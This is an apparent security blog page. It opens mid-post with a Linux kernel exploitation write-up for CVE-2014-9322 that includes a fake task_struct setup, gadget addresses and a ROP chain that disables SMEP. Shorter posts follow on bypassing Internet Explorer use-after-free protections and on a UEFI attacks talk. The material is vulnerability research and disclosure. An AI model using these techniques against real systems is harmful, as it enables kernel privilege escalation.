  1. Do nothing. Linux kernel, unlike e.g. Windows, is quite permissive when it gets an unexpected page fault in kernel mode – if possible, it kills the current process, and tries to continue (while Windows bluescreens immediately).
    This does not work – the result is massive kernel data corruption and whole system freeze. My suspicion is that after the current process is killed, the swapgs imbalance persists, resulting in many unexpected page faults in the context of the other processes.

  2. Use the “tsk->thread.error_code = error_code” write to overwrite IDT entry for the page fault handler. Then the page fault (triggered by, say, unhandled_signal()) will result in running our code. This technique proved to be successful on a couple of occasions before.
    This does not work, either, for two reasons:

    • Linux makes IDT read-only (bravo!)
    • even if IDT was writeable, we do not control the overwrite value – it is 0 or 0xd. If we overwrite the top DWORDS of IDT entry for #PF, the resulting address will be in usermode, and SMEP will prevent handler execution (more on SMEP later). We could nullify the lowest one or two bytes of the legal handler address, but the chances of these two addresses being an useful stack pivot sequence are negligible.
  3. We can try a race. Say, “tsk->thread.error_code = error_code” write facilitates code
    execution, e.g. allows to control code pointer P that is called via SOME_SYSCALL. Then we can trigger our vulnerability on CPU 0, and at the same time CPU 1 can run SOME_SYSCALL in a loop. The idea is that we will get code execution via CPU 1 before damage is done on CPU 0, and e.g. hook the page fault handler, so that CPU 0 can do no more harm.
    I tried this approach a couple of times, with no luck; perhaps with different vulnerability the timings would be different and it would work better.

  4. Throw a towel on “tsk->thread.error_code = error_code” write.

With some disgust, we will follow the last option. We will point “current” to usermode location, setting the pointers in it so that the read dereferences on them hit our (controlled) memory. Naturally, we inspect the subsequent code to find more pointer write dereferences.

Achieving write primitive continued, aka life after do_general_protection

Our next chance is the function called by do_general_protection():

int
force_sig_info(int sig, struct siginfo *info, struct task_struct *t)
{
        unsigned long int flags;
        int ret, blocked, ignored;
        struct k_sigaction *action;

        spin_lock_irqsave(&t->sighand->siglock, flags);
        action = &t->sighand->action[sig-1];
        ignored = action->sa.sa_handler == SIG_IGN;
        blocked = sigismember(&t->blocked, sig);   
        if (blocked || ignored) {
                action->sa.sa_handler = SIG_DFL;
                if (blocked) {
                        sigdelset(&t->blocked, sig);
                        recalc_sigpending_and_wake(t);
                }
        }
        if (action->sa.sa_handler == SIG_DFL)
                t->signal->flags &= ~SIGNAL_UNKILLABLE;
        ret = specific_send_sig_info(sig, info, t);
        spin_unlock_irqrestore(&t->sighand->siglock, flags);

        return ret;
}

The field “sighand” in task_struct is a pointer, that we can set to an arbitrary value. It means that the

action = &t->sighand->action[sig-1];
action->sa.sa_handler = SIG_DFL;

lines are another chance for write primitive to an arbitrary location. Again, we do not control the write value – it is the constant SIG_DFL, equal to 0.
This finally works, hurray ! with a little twist. Assume we want to overwrite location X in the kernel. We prepare our fake task_struct (particularly sighand field in it) so that X = address of t->sighand->action[sig-1].sa.sa_handler. But a few lines above, there is a line

spin_lock_irqsave(&t->sighand->siglock, flags);

As t->sighand->siglock is at constant offset from t->sighand->action[sig-1].sa.sa_handler, it means kernel will call spin_lock_irqsave on some address located after X, say at X+SPINLOCK, whose content we do not control. What happens then?
There are two possibilities:

  1. memory at X+SPINLOCK looks like an unlocked spinlock. spin_lock_irqsave will complete immediately. Final spin_unlock_irqrestore will undo the writes done by spin_lock_irqsave. Good.
  2. memory at X+SPINLOCK looks like a locked spinlock. spin_lock_irqsave will loop waiting for the spinlock – infinitely, if we do not react.
    This is worrying. In order to bypass this, we will need another assumption – we will need to know we are in this situation, meaning we will need to know the contents of memory at X+SPINLOCK. This is acceptable – we will see later that we will set X to be in kernel .data section. We will do the following:

    • initially, prepare FAKE_CURRENT so that t->sighand->siglock points to a locked spinlock in usermode, at SPINLOCK_USERMODE
    • force_sig_info() will hang in spin_lock_irqsave
    • at this moment, another usermode thread running on another CPU will change t->sighand, so that t->sighand->action[sig-1].sa.sa_handler is our overwrite target, and then unlock SPINLOCK_USERMODE
    • spin_lock_irqsave will return.
    • force_sig_info() will reload t->sighand, and perform the desired write.

A careful reader is encouraged to enquire why cannot use the latter approach in the case X+SPINLOCK is initially unlocked.
This is not all yet – we will need to prepare a few more fields in FAKE_CURRENT so that as little code as possible is executed. I will spare you the details – this blog is way too long already. The bottom line is that it works. What happens next? force_sig_info() returns, and do_general_protection() returns. The subsequent iret will throw #SS again (because still the usermode ss value on the stack refers to a nonpresent segment). But this time, the extra swapgs instruction in #SS handler will return the balance to the Force, cancelling the effect of the previous incorrect swapgs. do_general_protection() will be invoked and operate on real task_struct, not FAKE_CURRENT. Finally, the current task will be sent SIGSEGV, and another process will be scheduled for execution. The system remains stable.

Diagram1

Digression: SMEP

SMEP is a feature of Intel processors, starting from 3rd generation of Core processor. If the SMEP bit is set in CR4, CPU will refuse to execute code with kernel privileges if the code resides in usermode pages. Linux enables SMEP by default if available.

Achieving code execution

The previous paragraphs showed a way to overwrite 8 consecutive bytes in kernel memory with 0. How to turn this into code execution, assuming SMEP is enabled?
Overwriting a kernel code pointer would not work. We can either nullify its top bytes – but then the resulting address would be in usermode, and SMEP will prevent dereference of this pointer. Alternatively, we can nullify a few low bytes, but then the chances that the resulting pointer would point to an useful stack pivot sequence are low.
What we need is a kernel pointer P to structure X, that contains code pointers. We can overwrite top bytes of P so that the resulting address is in usermode, and P->code_pointer_in_x() call will jump to a location that we can choose.
I am not sure what is the best object to attack. For my experiments, I choose the kernel proc_root variable. It is a structure of type

struct proc_dir_entry {
            ...
        const struct inode_operations *proc_iops;
        const struct file_operations *proc_fops;
        struct proc_dir_entry *next, *parent, *subdir;
        ...
        u8 namelen;
        char name[];
};

This structure represents an entry in the proc filesystem (and proc_root represents the root of the /proc filesystem). When a filename path starting with /proc is looked up, the “subdir” pointers (starting with proc_root.subdir) are followed, until the matching name is found. Afterwards, pointers from proc_iops are called:

struct inode_operations {
        struct dentry * (*lookup) (struct inode *,struct dentry *, unsigned int);
        void * (*follow_link) (struct dentry *, struct nameidata *);
        ...many more...
        int (*update_time)(struct inode *, struct timespec *, int);
        ...
} ____cacheline_aligned;

proc_root resides in the kernel data section. It means that the exploit needs to know its address. This information is available from /proc/kallsyms; however, many hardened kernels do not allow unprivileged users to read from this pseudofile. Still, if the kernel is a known build (say, shipped with a distribution), this address can be obtained offline; along with tens of offsets required to build FAKE_CURRENT.
So, we will ovewrite proc_root.subdir so that it becomes a pointer to a controlled struct
proc_dir_entry residing in usermode. A slight complication is that we cannot overwrite the whole pointer. Remember, our write primitive is “overwrite with 8 zeroes”. If we made proc_root.subdir be 0, we would not be able to map it, because Linux does not allow usermode to map address 0 (more precisely, any address below /proc/sys/vm/mmap_min_addr, but the latter is 4k by default). It means we need to:

  1. map 16MB of memory at address 4096
  2. fill it with a pattern resembling proc_dir_entry, with the inode_operations field pointing to usermode address FAKE_IOPS, and name field being “A” string.
  3. configure the exploit to overwrite the top 5 bytes of proc_root.subdir

Then, unless the bottom 3 bytes of proc_root.subdir are 0, we can be sure that after triggering the overwrite in force_sig_info() proc_root.subdir will point to controlled usermode memory. When our process will call open(“/proc/A”, …), pointers from FAKE_IOPS will be called. What should they point to?
If you think the answer is “to our shellcode”, go back and read again.

We will need to point FAKE_IOPS pointers to a stack pivot sequence. This again assumes the knowledge of the precise version of the kernel running. The usual “xchg %esp, %eax; ret” code sequence (it is two bytes only, 94 c3, found at 0xffffffff8119f1ed in case of the tested kernel), works very well for 64bit kernel ROP. Even if there is no control over %rax, this xchg instruction operates on 32bit registers, thus clearing the high 32bits of %rsp, and landing %rsp in usermode memory. At the worst case, we may need to allocate low 4GB of virtual memory and fill it with rop chain.
In the case of the tested kernel, two different ways to dereference pointers in FAKE_IOPS were observed:

  1. %rax:=FAKE_IOPS; call *SOME_OFFSET(%rax)
  2. %rax:=FAKE_IOPS; %rax:=SOME_OFFSET(%rax); call *%rax

In the first case, after %rsp is exchanged with %rax, it will be equal to FAKE_IOPS. We need the rop chain to reside at the beginning of FAKE_IOPS, so it needs to start with something like “add $A_LOT, %rsp; ret”, and continue after the end of FAKE_IOPS pointers.
In the second case, the %rsp will be assigned the low 32bits of the call target, so 0x8119f1ed. We need to prepare the rop chain at this address as well.
To sum up, as the %rax value has one of two known values at the moment of the entry to the stack pivot sequence, we do not need to fill the whole 4G with rop chain, just the above two addresses.
The ROP chain itself is straightforward, shown for the second case:

unsigned long *stack=0x8119f1ed;
*stack++=0xffffffff81307bcdULL;  // pop rdi, ret
*stack++=0x407e0;                //cr4 with smep bit cleared
*stack++=0xffffffff8104c394ULL;  // mov rdi, cr4; pop %rbp; ret
*stack++=0xaabbccdd;             // placeholder for rbp
*stack++=actual_shellcode_in_usermode_pages;

Diagram2

Digression: SMAP

SMAP is a feature of Intel processors, starting from 5th generation of Core processor. If the SMAP bit is set in CR4, CPU will refuse to access memory with kernel privileges if this memory resides in usermode pages. Linux enables SMAP by default if available. A test kernel module (run on an a system with Core-M 5Y10a CPU) that tries to access usermode crashes with:

[  314.099024] running with cr4=0x3407e0
[  389.885318] BUG: unable to handle kernel paging request at 00007f9d87670000
[  389.885455] IP: [ffffffffa0832029] test_write_proc+0x29/0x50 [smaptest]
[  389.885577] PGD 427cf067 PUD 42b22067 PMD 41ef3067 PTE 80000000408f9867
[  389.887253] Code: 48 8b 33 48 c7 c7 3f 30 83 a0 31 c0 e8 21 c1 f0 e0 44 89 e0 48 8b 

As we can see, although the usermode page is present, access to it throws a page fault.
Windows systems do not seem to support SMAP; Windows 10 Technical Preview build 9926 runs with cr4=0x1506f8 (SMEP set, SMAP unset); in comparison with Linux (that was tested on the same hardware) you can see that bit 21 in cr4 is not set. This is not surprising; in case of Linux, access to usermode is performed explicitely, via copy_from_user, copy_to_user and similar functions, so it is doable to turn off SMAP temporarily for the duration of these functions. On Windows, kernel code accesses usermode directly, just wrapping the access in the exception handler, so it is more difficult to adjust all the drivers in all required places to work properly with SMAP.

SMAP to the rescue!

The above exploitation method relied on preparing certain data structures in usermode and forcing the kernel to interpret them as trusted kernel data. This approach will not work with SMAP enabled – CPU will refuse to read malicious data from usermode.
What we could do is to craft all the required data structures, and then copy them to the kernel. For instance if one does

write(pipe_filedescriptor, evil_data, ...

then evil_data will be copied to a kernel pipe buffer. We would need to guess its address; some sort of heap spraying, combined with the fact that there is no spoon^W effective kernel ASLR, could work, although it is likely to be less reliable than exploitation without SMAP.
However, there is one more hurdle – remember, we need to set usermode gs base to point to our exploit data structures. In the scenario above (without SMAP), we used arch_prctl(ARCH_SET_GS) syscall, that is implemented in the following way in the kernel:

long do_arch_prctl(struct task_struct *task, int code, unsigned long addr)
{ 
         int ret = 0; 
         int doit = task == current;
         int cpu;
 
         switch (code) { 
         case ARCH_SET_GS:
                 if (addr >= TASK_SIZE_OF(task))
                         return -EPERM; 
                 ... honour the request otherwise

Houston, we have a problem – we cannot use this API to set gs base above the end of usermode memory !
Recent CPUs feature wrgsbase instruction, that sets the gs base directly. This is a nonprivileged instruction, but needs to be enabled by the kernel by setting the FSGSBASE bit (no 16) in CR4. Linux does not set this bit, and therefore usermode cannot use this instruction.

On 64bits, nonsystem entries in GDT and LDT are still 8 bytes long, and the base field is at most 4G-1 – so, no chance to set up a segment with base address in kernel space.
So, unless I missed another way to set usermode gs base in the kernel range, SMAP protects 64bit Linux against achieving arbitrary code execution via exploiting CVE-2014-9322.

January 17, 2015 / Jared DeMott

Use-after-Free: New Protections, and how to Defeat them

The Problem

Memory corruption has plagued computers for decades, and these bugs can often be transformed into working cyber-attacks. Memory corruption is a situation where an attacker (malicious user of an application or network protocol) is able to send some data that is improperly processed by the native computer code. That can lead to important control structure changes that allow the attacker unexpected influence over the path a program will travel.

High-level protections, such as anti-virus (AV), have done little to stop the tide. That is because AV is poor at reacting to threats if they do not exist in their list of known attacks. Recent low-level operating system (OS) protections have helped. Non-executable memory and code module randomization help prevent attackers from leveraging memory corruption bugs, by stopping injected code from successfully executing.

Yet a new memory corruption exploit variant called return-oriented programming (ROP) has survived these defenses. ROP operates by leveraging existing code in memory to undo non-executable memory protections. New medium-level defenses, such as Microsoft’s anti-ROP add-on called EMET, have helped some. But a particularly troublesome bug known as Use-after-Free (UaF) has been applied in conjunction with other techniques to bypass EMET (See Prior Blog HERE). UaFs have been the basis of many current cyber attacks including Operation SnowMan (CVE-2014-0322) and Operation Clandestine Fox (CVE-2014-1776). Thus, it is clear that further low-level mitigations are required.

The Solution

To address the problem of UaF attacks, browser vendors have implemented new protections within the browser process. A UaF happens when (1) a low-level data structure (called an object in C++) is released prematurely. (2) An attacker knows about this release and quickly fills that space with data they control. (3) A dangling reference to the original object, which another part of the program assumes is still valid, is used. But of course, an attacker unwittingly changed the objects data. The intruder can now leverage the influence afforded by the corrupted memory state to hijack the compromised program.

Microsoft choose to tackle this serious UaF problem with two new protections. These protections work together to stop attackers from being able to allocation new data in the spot where a dangling reference points. They call the new protections Heap Isolation and Delayed Free. The premise of these protections is simple. Heap Isolation creates a new heap. A heap is a place that a program uses to create/free internal data as needed throughout execution. This new isolated heap houses many internal Internet Explorer objects. While objects likely to be under the influence of attacks (like strings created via Java Script) will still be allocated on the typical default heap. Thus, if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data. We could liken this situation to forcing naughty school kids to use a separate playground from the trusted kids. But who is naughty and who is good? So also an obvious weakness with this approach is that with the many different objects used in a complex program like a browser, it is difficult for developers to perfectly separate the two groups of objects.

So Microsoft also created a second cleaver protection. Delayed free operates by not releasing an objects memory right away. In our analogy, if we assume the goal of the naughty kid is to steal the place in line from a good kid that unexpected stepped out of line, we can think of this protection as the playground teacher watching that place in line for a while, before the slot is finally opened. Even though the program has asked the allocator to free a chunk of memory, the object is not freed, but is instead put on a list to be freed later, when the playground looks safer. That way even if an attacker knows of an object type on both heaps that could be used to replace the memory backing a dangling reference, they cannot since the memory has not actually been freed yet. The memory will not be truly freed until the following conditions are meet: there are no references to the object on the stack and there are at least 100,000 bytes waiting to be freed, or the per-thread call stack unwinds fully to its original starting point.

Evaluation

Though the new protections are definitely helpful, and I even recommend applying them to other applications, no native mitigation is enough. If we look back at the history of memory corruption, we see that every time vendors put forth a new OS security measure, it worked in slowing attackers for a season, but before long each mitigation was bypassed by some clever new attack.

In my research, I show that one such bypass against these new protections involves using what I call a “long lived” dangling pointer. In my naughty child analogy, we can think of this as the sneaky and patient child that can go to either playground, and will wait for just the right moment before slipping ahead in line. In more technical terms, if an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds). And finding useful objects in either playground to replace the original turns out not to be that difficult either. I wrote a python script to search the core Internet Explorer code module (called MSHTML.dll). The script finds all the different objects, their sizes, and notes rather it is allocated to the default or isolated heap. This information can be used to help locate useful objects to attack either heap.  And with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object. This is useful for changing critical data (like the vtable pointer) at the proper offset in what was the original object. The python code is HERE. For complete details on this research, please see the slides from my January 17th ShmooCon talk HERE.

January 6, 2015 / Rafal Wojtczuk

CCC31 talk about UEFI security

Recently I presented at the 31st Chaos Communication Congress (together with Corey Kallenberg) and presented a talk titled “Attacks on UEFI security”. We described (and demoed) vulnerabilities allowing us to achieve write access to the flash chip (that stores UEFI code) and to SMM memory (that holds the code for the all-powerful System Management Mode). The CERT vulnerability notes are here, here and here ; you are also encouraged to read the presentation, the whitepaper and the second whitepaper.
TL;DR-style, these vulnerabilities are useful for an attacker who already has administrative privileges in the operating system, and wants to install a UEFI-based or SMM-based rootkit. So no, the sky is not falling, and this type of attack is not seen often in the wild. Yet some well knows cases are known, and as the topic gains quite some attention recently, there might be more in the future.

Follow

Get every new post delivered to your Inbox.

Join 10,461 other followers